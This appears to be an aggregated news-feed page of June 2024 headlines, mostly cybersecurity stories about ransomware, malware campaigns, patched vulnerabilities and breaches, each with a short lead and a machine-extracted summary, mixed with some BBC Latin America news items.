          A novel Android attack vector from a piece of malware tracked as Snowblind is abusing a security feature to bypass existing anti-tampering protections in apps that handle sensitive user data. [...] "

          Autosummary: Unlike other Android malware, though, Snowblind abuses "seccomp", short for secure computing, a Linux kernel feature that Android uses for integrity checks on applications, to protect users against malicious actions such as application repackaging. "


          Malwarebytes Premium stops 100% of malware during AV Lab test

          exploits
          2024-06-26 https://www.malwarebytes.com/blog/personal/2024/06/malwarebytes-premium-stops-100-of-malware-during-av-lab-test
          Malwarebytes Premium blocked 100% of malware during the most recent testing by the AV Lab Cybersecurity Foundation. "

          Autosummary: "


          Malware peddlers experimenting with BPL sideloading and masking malicious payloads as PGP keys

          exploits
          2024-06-26 https://www.helpnetsecurity.com/2024/06/26/malware-bpl-sideloading/

          A newly spotted campaign is leveraging BPL sideloading and other uncommon tricks to deliver the IDAT Loader (aka HijackLoader) malware and prevent its detection. The campaign Spotted by Kroll’s incident responders and analyzed by the company’s Cyber Threat Intelligence (CTI) team, the campaign involves: a Bollywood pirate movie download site pointing to a page hosted on the Bunny content delivery platform, which in turn points to a ZIP file; within that ZIP file, another password-protected ZIP … More

          The post Malware peddlers experimenting with BPL sideloading and masking malicious payloads as PGP keys appeared first on Help Net Security.

          "

          Autosummary: The campaign Spotted by Kroll’s incident responders and analyzed by the company’s Cyber Threat Intelligence (CTI) team, the campaign involves: a Bollywood pirate movie download site pointing to a page hosted on the Bunny content delivery platform, which in turn points to a ZIP file; within that ZIP file, another password-protected ZIP file and a text file with the password; within that second ZIP file, a LNK file and a decoy “trailer” video file. “The LNK file triggered the first element of the novel technique used in this infection chain for distributing IDAT Loader. "


          Chinese and N. Korean Hackers Target Global Infrastructure with Ransomware

          exploits ransomware
          2024-06-26 https://thehackernews.com/2024/06/chinese-and-n-korean-hackers-target.html
          Threat actors with suspected ties to China and North Korea have been linked to ransomware and data encryption attacks targeting government and critical infrastructure sectors across the world between 2021 and 2023. While one cluster of activity has been associated with the ChamelGang (aka CamoFei), the second cluster overlaps with activity previously attributed to Chinese and North Korean



          Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping

          exploits
          2024-06-26 https://thehackernews.com/2024/06/apple-patches-airpods-bluetooth.html
          Apple has released a firmware update for AirPods that could allow a malicious actor to gain access to the headphones in an unauthorized manner. Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro. "When your headphones are seeking a connection request to one of your previously

          Autosummary: Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro. "When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory.


          Exploit for critical Fortra FileCatalyst Workflow SQLi flaw released

          exploits
          2024-06-26 https://www.bleepingcomputer.com/news/security/exploit-for-critical-fortra-filecatalyst-workflow-sqli-flaw-released/
          The Fortra FileCatalyst Workflow is vulnerable to an SQL injection vulnerability that could allow remote unauthenticated attackers to create rogue admin users and manipulate data on the application database. [...]

          Autosummary: Tenable discovered CVE-2024-5276 on May 15, 2024, and first disclosed the issue to Fortra on May 22, along with a proof-of-concept (PoC) exploit demonstrating the vulnerability.


          Hackers target new MOVEit Transfer critical auth bypass bug

          exploits
          2024-06-26 https://www.bleepingcomputer.com/news/security/hackers-target-new-moveit-transfer-critical-auth-bypass-bug/
          Threat actors are attempting to exploit a critical authentication bypass flaw impacting Progress MOVEit Transfer, which the vendor disclosed yesterday. [...]

          Autosummary: As Progress explained in the security bulletin, CVE-2024-5806 impacts the following product versions: 2023.0.0 before 2023.0.11, 2023.1.0 before 2023.1.6, and 2024.0.0 before 2024.0.2. Fixes were made available in MOVEit Transfer 2023.0.11, 2023.1.6, and 2024.0.2, available on the Progress Community portal.


          Federal Reserve “breached” data may actually belong to Evolve Bank

          financial
          2024-06-26 https://www.malwarebytes.com/blog/news/2024/06/federal-reserve-breached-data-may-actually-belong-to-evolve-bank
          LockBit claimed to have breached the Federal Reserve, but in fact the data came from Evolve Bank & Trust.

          Autosummary: The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City and San Francisco. However, when that deadline passed and the data was released, people who looked at the data found it did not, in fact, belong to the Federal Reserve but instead to a particular financial organization: Evolve Bank & Trust. At that time, the US Federal Reserve Board penalized Evolve Bancorp and its subsidiary, Evolve Bank & Trust, for multiple “deficiencies” in the bank’s risk management, anti-money laundering (AML) and compliance practices. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.


          New MOVEit Transfer Vulnerability Under Active Exploitation - Patch ASAP!

          exploits
          2024-06-26 https://thehackernews.com/2024/06/new-moveit-transfer-vulnerability-under.html
          A newly disclosed critical security flaw impacting Progress Software MOVEit Transfer is already seeing exploitation attempts in the wild shortly after details of the bug were publicly disclosed. The vulnerability, tracked as CVE-2024-5806 (CVSS score: 9.1), concerns an authentication bypass that impacts the following versions - From 2023.0.0 before 2023.0.11 From 2023.1.0 before 2023.1.6, and



          One killed after Colombia cable car falls from station

          latam
          2024-06-26 https://www.bbc.com/news/articles/cn338m5l98jo
          Officials told local media the cabin detached and fell after striking the cabin in front.



          LockBit lied: Stolen data is from a bank, not US Federal Reserve

          financial ransomware
          2024-06-26 https://www.bleepingcomputer.com/news/security/lockbit-lied-stolen-data-is-from-a-bank-not-us-federal-reserve/
          Recently-disrupted LockBit ransomware group, in a desperate attempt to make a comeback, claimed this week that it had hit the Federal Reserve, the central bank of the United States. Except, the rumor has been quashed. [...]

          Autosummary: "You better hire another negotiator within 48 hours, and fire this clinical idiot who values Americans' bank secrecy at $50,000." Eventually, the group began publishing the stolen data on its site. Previously notorious for executing ransomware attacks on high-profile targets like Boeing, the Continental automotive giant, the Italian Internal Revenue Service, Bank of America, the UK Royal Mail, and most recently London Drugs, the cybercrime group found itself in hot water this year.


          New MOVEit Transfer critical bug is actively exploited

          exploits
          2024-06-26 https://securityaffairs.com/164949/hacking/progress-moveit-transfer-flaw-actively-exploited.html
          Experts warn of active exploitation of a critical authentication bypass vulnerability in MOVEit Transfer file transfer software. Progress Software addressed two critical authentication bypass vulnerabilities, tracked as CVE-2024-5805 and CVE-2024-5806, affecting its MOVEit Transfer file transfer software. The vulnerability CVE-2024-5805 (CVSS score 9.1) is an improper authentication vulnerability in Progress MOVEit Gateway (SFTP module) that allows authentication […]

          Autosummary: Pierluigi Paganini, June 26, 2024. Experts warn of active exploitation of a critical authentication bypass vulnerability in MOVEit Transfer file transfer software.


          Soldiers surround Bolivian presidential palace in attempted coup

          latam
          2024-06-26 https://www.bbc.com/news/articles/c288eewr1wko
          Armoured vehicles and soldiers take positions in the centre of the capital La Paz.

          Autosummary: Mr Arce subsequently urged Bolivians to mobilise against a "coup d'etat". "We need the Bolivian people to organize and mobilize against the coup d'etat in favor of democracy," Arce said in a televised message to the country alongside his ministers inside the presidential palace.


          CISOs’ new ally: Qualys CyberSecurity Asset Management 3.0

          ciber
          2024-06-25 https://www.helpnetsecurity.com/2024/06/25/kunal-modasiya-qualys-cybersecurity-asset-management-3-0/

          In this Help Net Security interview, Kunal Modasiya, VP of Product Management and Growth at Qualys, explores the key features, significant advantages, and innovative technologies behind Qualys CyberSecurity Asset Management 3.0. Can you explain the key features of Qualys CyberSecurity Asset Management 3.0 and how it differs from previous versions? The modern attack surface continues to evolve, and it is becoming untenable for organizations today to rely on siloed point solutions for narrow asset discovery …


          Autosummary: This includes scanning and sensors for IT assets, patent-pending EASM technology, monitoring of multi-cloud environments, built-in network passive sensing, and third-party connectors to enrich the asset inventory. Now, end-of-support (EoS) software, missing security controls (such as having no endpoint detection and response (EDR) agents), risky open ports, and misconfigured or unauthorized software and services are all baked into the TruRisk Score to help cybersecurity teams automatically pinpoint the greatest risks. Gary Bowen, director of security operations at Brown & Brown Insurance, noted, “The Qualys Cloud Agent passive sensor has proven to be a game-changer, providing us with unparalleled visibility and immediate insights across our hybrid IT and OT domains, all without the complexities of identifying optimal locations for network taps.


          Breaking down the numbers: Q2 2024 cybersecurity funding activity recap

          ciber
          2024-06-25 https://www.helpnetsecurity.com/2024/06/25/cybersecurity-funding-q2-2024/

          We present a list of selected cybersecurity companies that received funding during the second quarter of 2024 (Q2 2024). Alethea (April, $20 million): Alethea closed a $20 million Series B funding round led by GV, with participation from Ballistic Ventures, who led Alethea’s Series A funding in 2022. Also participating in the round is Hakluyt Capital, which invests alongside leading venture capital funds, targeting companies with high growth potential and international ambitions. BforeAI (April) …


          Autosummary: StrikeReady (April, $12 million): StrikeReady has received $12 million in Series A funding, led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital, and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf, and Rod Beckstrom, former CEO of ICANN and Founding Director of the U.S. National Cybersecurity Center (now CISA). Transcend (May, $40 million): Transcend raised $40 million in Series B funding led by new investor StepStone Group, with participation from HighlandX and existing investors Accel, Index Ventures, 01 Advisors (01A), Script Capital, and South Park Commons.


          P2PInfect botnet targets Redis servers with new ransomware module

          exploits ransomware
          2024-06-25 https://www.bleepingcomputer.com/news/security/p2pinfect-botnet-targets-redis-servers-with-new-ransomware-module/
          P2PInfect, originally a dormant peer-to-peer malware botnet with unclear motives, has finally come alive to deploy a ransomware module and a cryptominer in attacks on Redis servers. [...]

          Autosummary: The ransomware targets files with specific extensions related to databases (SQL, SQLITE3, DB), documents (DOC, XLS), and media files (MP3, WAV, MKV) and appends the ".encrypted" extension to the resulting files.


          Ransomware disrupts Indonesia’s national data centre, LockBit gang claims US Federal Reserve breach

          exploits ransomware
          2024-06-25 https://www.helpnetsecurity.com/2024/06/25/lockbit-indonesia-us-fed/

          Ransomware attackers wielding a LockBit variant dubbed Brain Cipher have disrupted a temporary national data center facility which supports the operations of 200+ Indonesian government agencies and public services. The attackers are asking for an $8 million ransom, which the Indonesian government is determined not to pay, according to The Jakarta Post. “As of today, Monday 24 June 2024, since 07:00 Western Standard Time, the affected Immigration Services have been operating normally. These include Visa …


          Autosummary: These include Visa and Stay Permit Services, Immigration Checkpoint Services (TPI), Passport Services, Visa on Arrival (VOA) on boarding Services, and Immigration Document Management Services,” the Indonesian Ministry of Communication and Information (KomInfo) has announced on Monday.


          New Attack Technique Exploits Microsoft Management Console Files

          exploits
          2024-06-25 https://thehackernews.com/2024/06/new-attack-technique-exploits-microsoft.html
          Threat actors are exploiting a novel attack technique in the wild that leverages specially crafted management saved console (MSC) files to gain full code execution using Microsoft Management Console (MMC) and evade security defenses. Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware



          New Cyberthreat "Boolka" Deploying BMANAGER Trojan via SQLi Attacks

          exploits
          2024-06-25 https://thehackernews.com/2024/06/new-cyberthreat-boolka-deploying.html
          A previously undocumented threat actor dubbed Boolka has been observed compromising websites with malicious scripts to deliver a modular trojan codenamed BMANAGER. "The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022," Group-IB researchers Rustam Mirkasymov and Martijn van den Berk said in a



          New Medusa malware variants target Android users in seven countries

          exploits
          2024-06-25 https://www.bleepingcomputer.com/news/security/new-medusa-malware-variants-target-android-users-in-seven-countries/
          The Medusa banking trojan for Android has re-emerged after almost a year of keeping a lower profile in campaigns targeting France, Italy, the United States, Canada, Spain, the United Kingdom, and Turkey. [...]

          Autosummary: Cleafy’s analysis shows that the malware authors removed 17 commands from the previous version of the malware and added five new ones: destroyo (uninstall a specific application), permdrawover (request ‘Drawing Over’ permission), setoverlay (set a black screen overlay), take_scr (take a screenshot) and update_sec (update user secret). The ‘setoverlay’ command is noteworthy as it allows remote attackers to perform deceptive actions such as making the device appear locked/shut off to mask malicious ODF activities occurring in the background.


          Neiman Marcus confirms data breach after Snowflake account hack

          financial
          2024-06-25 https://www.bleepingcomputer.com/news/security/neiman-marcus-confirms-data-breach-after-snowflake-account-hack/
          Luxury retailer Neiman Marcus confirmed it suffered a data breach after hackers attempted to sell the company’s database stolen in recent Snowflake data theft attacks. [...]

          Autosummary: According to the threat actor, the stolen data included what Neiman Marcus shared, plus the last four digits of social security numbers, customer transactions, customer emails, shopping records, employee data, and millions of gift card numbers.


          FBI warns of fake law firms targeting crypto scam victims

          financial
          2024-06-25 https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-law-firms-targeting-crypto-scam-victims/
          The FBI is warning of cybercriminals posing as law firms and lawyers that offer cryptocurrency recovery services to victims of investment scams and steal funds and personal information. [...]

          Autosummary: State-level authorities and federal intelligence agencies can, under certain circumstances, track stolen crypto, freeze it, and possibly divert it to safe wallets to be redistributed back to victims.


          Mirai-like botnet is exploiting recently disclosed Zyxel NAS flaw

          exploits
          2024-06-25 https://securityaffairs.com/164927/cyber-crime/mirai-like-botnet-zyxel-nas.html
          Researchers warn that a Mirai-based botnet is exploiting a recently disclosed critical vulnerability in EoL Zyxel NAS devices. Researchers at the Shadowserver Foundation warn that a Mirai-based botnet has started exploiting a recently disclosed vulnerability tracked as CVE-2024-29973 (CVSS score 9.8) in end-of-life Zyxel NAS products. The flaw is a command injection vulnerability […]



          Why are threat actors faking data breaches?

          financial
          2024-06-24 https://www.helpnetsecurity.com/2024/06/24/faking-data-breaches/

          Earlier this year Europcar discovered a hacker selling info on its 50 million customers on the dark web. The European car rental company immediately launched an investigation, only to discover that the data being sold was completely doctored, possibly using generative AI. Why fake a data breach? The most obvious reason why hackers are selling fake data is because there is money to be made. When you think of it, it is like a criminal …


          Autosummary: Uncovering security processes and setup: Just like you need bait to hook a fish, cybercriminals can use the pretext of a data breach to understand a company’s security setup, its security capabilities, processes, and threat response time. Threat actors can announce a fake data breach, which can spark fears, panic and loss of public confidence, causing the stock prices to drop; in this way, cybercriminals can manipulate the market for financial gain.


          ExCobalt Cybercrime group targets Russian organizations in multiple sectors

          rusia-ucrania
          2024-06-24 https://securityaffairs.com/164838/breaking-news/excobalt-cybercrime-group-targets-russian-orgs.html
          The cybercrime group ExCobalt targeted Russian organizations in multiple sectors with a previously unknown backdoor known as GoRed. Positive Technologies researchers reported that a cybercrime gang called ExCobalt targeted Russian organizations in multiple sectors with a previously unknown Golang-based backdoor known as GoRed. Members of the ExCobalt group have been active since at least 2016, […]

          Autosummary: The group exploited the following vulnerabilities for privilege escalation: CVE-2022-2586, CVE-2021-3156, CVE-2021-4034, CVE-2019-13272, CVE-2022-27228, CVE-2021-44228, CVE-2021-40438, CVE-2023-3519, BDU:2023-05857, and CVE-2019-12725.


          LockBit claims the hack of the US Federal Reserve

          ransomware
          2024-06-24 https://securityaffairs.com/164873/cyber-crime/lockbit-claims-hacked-us-federal-reserve.html
          The Lockbit ransomware group announced that it had breached the US Federal Reserve and exfiltrated 33 TB of sensitive data. The Lockbit ransomware group announced that it had breached the systems of the Federal Reserve of the United States and exfiltrated 33 TB of sensitive data, including “Americans’ banking secrets.” The Lockbit ransomware group added the […]

          Autosummary: The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City, and San Francisco.”


          Ransomware threat landscape Jan-Apr 2024: insights and challenges

          exploits
          2024-06-24 https://securityaffairs.com/164857/cyber-crime/ransomware-threat-landscape-jan-apr-2024-insights-and-challenges.html
          Between Jan and Apr 2024, the global ransomware landscape witnessed significant activity, with 1420 ransomware claims reported worldwide. In the first four months of 2024, the global ransomware landscape witnessed significant activity, with 1420 ransomware claims reported worldwide, including 55 in Italy. These findings, sourced from the Ransomfeed platform, shed light on the geographical distribution […]

          Autosummary: Pierluigi Paganini, June 24, 2024. Between Jan and Apr 2024, the global ransomware landscape witnessed significant activity, with 1420 ransomware claims reported worldwide.


          Change Healthcare confirms the customer data stolen in ransomware attack

          exploits ransomware
          2024-06-24 https://www.malwarebytes.com/blog/news/2024/06/change-healthcare-confirms-the-customer-data-stolen-in-ransomware-attack
          Change Healthcare has detailed the types of medical and patient data that was stolen in a recent ransomware attack.

          Autosummary: Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due. Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment. Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers.


          Google Introduces Project Naptime for AI-Powered Vulnerability Research

          exploits
          2024-06-24 https://thehackernews.com/2024/06/google-introduces-project-naptime-for.html
          Google has developed a new framework called Project Naptime that it says enables a large language model (LLM) to carry out vulnerability research with an aim to improve automated discovery approaches. "The Naptime architecture is centered around the interaction between an AI agent and a target codebase," Google Project Zero researchers Sergei Glazunov and Mark Brand said. "The agent is provided



          Critical RCE Vulnerability Discovered in Ollama AI Infrastructure Tool

          exploits
          2024-06-24 https://thehackernews.com/2024/06/critical-rce-vulnerability-discovered.html
          Cybersecurity researchers have detailed a now-patched security flaw affecting the Ollama open-source artificial intelligence (AI) infrastructure platform that could be exploited to achieve remote code execution. Tracked as CVE-2024-37032, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version

          Autosummary: The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover.


          Charli XCX urges fans to stop anti-Taylor chants after Brazil gig reports

          latam
          2024-06-24 https://www.bbc.com/news/articles/c9888130v4vo
          The Brat singer says she "won't tolerate" abuse aimed at Taylor Swift at her shows.

          Autosummary: By Riyah Collins, BBC Newsbeat. Charli XCX says she "won't tolerate" the chants at her shows. Charli XCX has urged fans to stop chanting "Taylor Swift is dead" at her gigs.


          Exploding batteries spark deadly S Korea factory fire

          industry
          2024-06-24 https://www.bbc.com/news/articles/crgggmeyjj7o
          At least 22 people have been confirmed dead while eight others were injured, local authorities say.

          Autosummary: Whatever the cause, once the fire took hold, it would have spread at speed - giving the workers little time to escape, according to Kim Jae-ho, fire and disaster prevention professor at Daejeon University.


          Four FIN9 hackers indicted for cyberattacks causing $71M in losses

          ciber
          2024-06-24 https://www.bleepingcomputer.com/news/security/four-fin9-hackers-indicted-for-cyberattacks-causing-71m-in-losses/
          Four Vietnamese nationals linked to the international cybercrime group FIN9 have been indicted for their involvement in a series of computer intrusions that caused over $71 million in losses to companies in the U.S. [...]

          Autosummary: Once FIN9 established access to a target network, they stole confidential data, including financial information, account credentials, employee benefits, gift cards, and credit card information.


          Week in review: CDK Global cyberattack, critical vCenter Server RCE fixed

          ciber
          2024-06-23 https://www.helpnetsecurity.com/2024/06/23/week-in-review-cdk-global-cyberattack-vcenter-server-critical-rce-fixed/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: The rise of SaaS security teams In this Help Net Security interview, Hillary Baron, Senior Technical Director for Research at CSA, highlights that the recent surge in organizations establishing dedicated SaaS security teams is driven by significant data breaches involving widely used platforms. Enhancing security through collaboration with the open-source community In this Help Net Security interview, Alan DeKok, CEO …


          Autosummary: SELKS: Open-source Suricata IDS/IPS, network security monitoring, threat hunting. SELKS is a free, open-source, turnkey solution for Suricata-based network intrusion detection and protection (IDS/IPS), network security monitoring (NSM), and threat hunting. Cilium: Open-source eBPF-based networking, security, observability. Cilium is an open-source, cloud-native solution that leverages eBPF technology in the Linux kernel to provide, secure, and monitor network connectivity between workloads.


          Threat actors are actively exploiting SolarWinds Serv-U bug CVE-2024-28995

          exploits
          2024-06-23 https://securityaffairs.com/164806/hacking/solarwinds-serv-u-cve-2024-28995-exploit.html
          Threat actors are actively exploiting a recently discovered vulnerability in SolarWinds Serv-U software using publicly available proof-of-concept (PoC) code. Threat actors are actively exploiting a recently discovered vulnerability, tracked as CVE-2024-28995, in SolarWinds Serv-U software. The vulnerability CVE-2024-28995 is a high-severity directory traversal issue that allows attackers to read sensitive files on the host machine. […]

          Autosummary: Pierluigi Paganini, June 23, 2024. Threat actors are actively exploiting a recently discovered vulnerability in SolarWinds Serv-U software using publicly available proof-of-concept (PoC) code.


          Facebook PrestaShop module exploited to steal credit cards

          exploits
          2024-06-23 https://www.bleepingcomputer.com/news/security/facebook-prestashop-module-exploited-to-steal-credit-cards/
          Hackers are exploiting a flaw in a premium Facebook module for PrestaShop named pkfacebook to deploy a card skimmer on vulnerable e-commerce sites and steal people’s payment credit card details. [...]

          Autosummary: Friends-Of-Presta notes that all versions should be considered as potentially impacted and recommends the following mitigations: Upgrade to the latest pkfacebook version, which disables multiquery executions, even if it does not protect against SQL injection using the UNION clause.


          Penis cancer on the rise: Brazil sees 6,500 amputations in a decade

          latam
          2024-06-22 https://www.bbc.com/news/articles/c9rr7z5gk62o
          "It's something you never imagine will happen to you," says João, 63, who underwent a partial amputation.

          Autosummary: "In Brazil, despite the availability of the vaccine, the HPV vaccination rate remains low for girls - reaching only 57% - and for boys, it doesn't exceed 40%,” he says. "However, in total amputation, the urethral orifice can be relocated to the perineum, between the scrotum and the anus, requiring the patient to urinate while sitting on the toilet.


          ExCobalt Cyber Gang Targets Russian Sectors with New GoRed Backdoor

          rusia-ucrania
          2024-06-22 https://thehackernews.com/2024/06/excobalt-cyber-gang-targets-russian.html
          Russian organizations have been targeted by a cybercrime gang called ExCobalt using a previously unknown Golang-based backdoor known as GoRed. "ExCobalt focuses on cyber espionage and includes several members active since at least 2016 and presumably once part of the notorious Cobalt Gang," Positive Technologies researchers Vladislav Lunin and Alexander Badayev said in a technical report



          Experts found a bug in the Linux version of RansomHub ransomware

          exploits ransomware Linux
          2024-06-22 https://securityaffairs.com/164779/cyber-crime/ransomhub-ransomware-esxi-encryptor.html
          The RansomHub ransomware operators added a Linux encryptor to their arsenal; the version targets VMware ESXi environments. The RansomHub ransomware operation relies on a new Linux version of the encryptor to target VMware ESXi environments. Although RansomHub only emerged in February 2024, it has rapidly grown and has become the fourth most prolific ransomware operator over […]

          Autosummary: Pierluigi Paganini, June 22, 2024. The RansomHub ransomware operators added a Linux encryptor to their arsenal; the version targets VMware ESXi environments.


          US government sanctions twelve Kaspersky Lab executives

          government
          2024-06-22 https://securityaffairs.com/164792/security/us-sanctions-kaspersky-lab-executives.html
          The Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned twelve Kaspersky Lab executives for their role in the Russian company. The Treasury Department’s Office of Foreign Assets Control (OFAC) has sanctioned twelve Kaspersky Lab executives for their role in the Russian company. All the sanctioned individuals are in executive and senior leadership roles at AO Kaspersky […]

          Autosummary: Suvorov – Head of Kaspersky Operating System Business Unit; Denis Vladimirovich Zenkin – Head of Corporate Communications; Marina Mikhaylovna Alekseeva – Chief Human Resources (HR) Officer (CHRO); Mikhail Yuryevich Gerber – Executive Vice President of Consumer Business; Anton Mikhaylovich Ivanov – Chief Technology Officer (CTO); Kirill Aleksandrovich Astrakhan – Executive Vice President for Corporate Business; Anna Vladimirovna Kulashova – Managing Director for Russia and the Commonwealth of Independent States (CIS); Daniil Sergeyevich Borshchev – Board member and Deputy CEO of Strategy and Economics; Andrei Anatolyevich Efremov – Board member and Chief Business Development Officer (CBDO); Igor Gennadyevich Chekunov – Board member and Chief Legal Officer (CLO). The individuals listed were designated under Executive Order 14024 for their involvement in the technology sector of the Russian Federation economy.


          CDK Global outage caused by BlackSuit ransomware attack

          exploits ransomware
          2024-06-22 https://www.bleepingcomputer.com/news/security/cdk-global-outage-caused-by-blacksuit-ransomware-attack/
The BlackSuit ransomware gang is behind CDK Global's massive IT outage and disruption to car dealerships across North America, according to multiple sources familiar with the matter. [...]

Autosummary: "As a result, the Company experienced disruptions to its dealer management system ("DMS") hosted by CDK, which supports critical dealership operations including those supporting sales, inventory and accounting functions and its customer relationship management ("CRM") system," reported Sonic Automotive in an SEC filing.


          Ratel RAT targets outdated Android phones in ransomware attacks

          exploits ransomware
          2024-06-22 https://www.bleepingcomputer.com/news/security/ratel-rat-targets-outdated-android-phones-in-ransomware-attacks/
An open-source Android malware named "Ratel RAT" is widely deployed by multiple cybercriminals to attack outdated devices, some aiming to lock them down with a ransomware module that demands payment on Telegram. [...]

Autosummary: As for targeted brands and models, there's a mix of everything, including Samsung Galaxy, Google Pixel, Xiaomi Redmi, Motorola One, and devices from OnePlus, Vivo, and Huawei.


          Rafel RAT targets outdated Android phones in ransomware attacks

          exploits ransomware
          2024-06-22 https://www.bleepingcomputer.com/news/security/rafel-rat-targets-outdated-android-phones-in-ransomware-attacks/
An open-source Android malware named "Rafel RAT" is widely deployed by multiple cybercriminals to attack outdated devices, some aiming to lock them down with a ransomware module that demands payment on Telegram. [...]

Autosummary: As for targeted brands and models, there's a mix of everything, including Samsung Galaxy, Google Pixel, Xiaomi Redmi, Motorola One, and devices from OnePlus, Vivo, and Huawei.


          Was T-Mobile compromised by a zero-day in Jira?

          exploits
          2024-06-21 https://www.malwarebytes.com/blog/news/2024/06/was-t-mobile-compromised-by-a-zero-day-in-jira
IntelBroker is offering source code from major companies for sale. Are they demonstrating the value of a zero-day they are also selling?

Autosummary: The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.”


          Oyster Backdoor Spreading via Trojanized Popular Software Downloads

          exploits
          2024-06-21 https://thehackernews.com/2024/06/oyster-backdoor-spreading-via.html
A malvertising campaign is leveraging trojanized installers for popular software such as Google Chrome and Microsoft Teams to drop a backdoor called Oyster (aka Broomstick and CleanUpLoader). That's according to findings from Rapid7, which identified lookalike websites hosting the malicious payloads that users are redirected to after searching for them on search engines like Google and Bing. The

Autosummary: Specifically, the executable serves as a pathway for a backdoor called Oyster, which is capable of gathering information about the compromised host, communicating with a hard-coded command-and-control (C2) address, and supporting remote code execution.


          SolarWinds Serv-U Vulnerability Under Active Attack - Patch Immediately

          exploits
          2024-06-21 https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html
A recently patched high-severity flaw impacting SolarWinds Serv-U file transfer software is being actively exploited by malicious actors in the wild. The vulnerability, tracked as CVE-2024-28995 (CVSS score: 8.6), concerns a directory traversal bug that could allow attackers to read sensitive files on the host machine. Affecting all versions of the software prior to and including Serv-U 15.4.2



          TikTok confirms it offered US government a "kill switch"

          government
          2024-06-21 https://www.bbc.com/news/articles/cxwwz7l02j0o
The platform made the disclosure as part of its legal challenge against a law forcing its sale in the US.

Autosummary: A draft "National Security Agreement", proposed by TikTok in August 2022, would have seen the company having to follow rules such as properly funding its data protection units and making sure that ByteDance did not have access to US users' data.


          Change Healthcare lists the medical data stolen in ransomware attack

          exploits ransomware
          2024-06-21 https://www.bleepingcomputer.com/news/security/change-healthcare-lists-the-medical-data-stolen-in-ransomware-attack/
UnitedHealth has confirmed for the first time what types of medical and patient data were stolen in the massive Change Healthcare ransomware attack, stating that data breach notifications will be mailed in July. [...]

Autosummary: According to the data breach notification, a massive trove of sensitive information was stolen, including: health insurance information (such as primary, secondary or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers); health information (such as medical record numbers, providers, diagnoses, medicines, test results, images, care and treatment); billing, claims and payment information (such as claim numbers, account numbers, billing codes, payment cards, financial and banking information, payments made, and balance due); and/or other personal information such as Social Security numbers, driver’s licenses or state ID numbers, or passport numbers.


          Military-themed Email Scam Spreads Malware to Infect Pakistani Users

          financial exploits
          2024-06-21 https://thehackernews.com/2024/06/military-themed-emails-used-to-spread.html
Cybersecurity researchers have shed light on a new phishing campaign that has been identified as targeting people in Pakistan using a custom backdoor. Dubbed PHANTOM#SPIKE by Securonix, the unknown threat actors behind the activity have leveraged military-related phishing documents to activate the infection sequence. "While there are many methods used today to deploy malware, the threat actors



          US sanctions 12 Kaspersky Lab execs for working in Russian tech sector

          rusia-ucrania
          2024-06-21 https://www.bleepingcomputer.com/news/security/us-sanctions-12-kaspersky-lab-execs-for-working-in-russian-tech-sector/
The Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned twelve Kaspersky Lab executives for operating in the technology sector of Russia. [...]

Autosummary: Mikhail Yuryevich Gerber (Gerber) - Executive Vice President of Consumer Business; Anton Mikhaylovich Ivanov (Ivanov) - Chief Technology Officer (CTO); Kirill Aleksandrovich Astrakhan (Astrakhan) - Executive Vice President for Corporate Business; Anna Vladimirovna Kulashova (Kulashova) - Managing Director for Russia and the Commonwealth of Independent States (CIS). While many of these members report directly to the CEO, Eugene Kaspersky, the US government says it has not sanctioned Kaspersky Lab, its parent or subsidiary companies, or its CEO.


          Guerrilla fighters luring Colombian schoolchildren on TikTok

          latam
          2024-06-21 https://www.bbc.com/news/articles/cgxxjzlg89zo
Rebel groups in rural Colombia are using social media to recruit young people to their ranks.

Autosummary: “One or two start the trend and it becomes fashionable in the classroom,” says Lorena (not her real name), a 30-year-old teacher in Cauca, a rural region in south-western Colombia. She says as she enters her class, she is often met by students filming themselves on their smartphones, drawing symbols inspired by the now-demobilised Revolutionary Armed Forces of Colombia guerrilla group (Farc) on the blackboard, or dancing to revolutionary tunes. Now, with the majority of students having phones with internet access, "we can't control it," she says: "They’re always on them."


          The long-tail costs of a data breach – Week in security with Tony Anscombe

          financial
          2024-06-21 https://www.welivesecurity.com/en/videos/long-tail-costs-data-breach-week-security-tony-anscombe/
Understanding and preparing for the potential long-tail costs of data breaches is crucial for businesses that aim to mitigate the impact of security incidents.



          Improving OT cybersecurity remains a work in progress

          ciber
          2024-06-20 https://www.helpnetsecurity.com/2024/06/20/ot-security-improvement-areas/

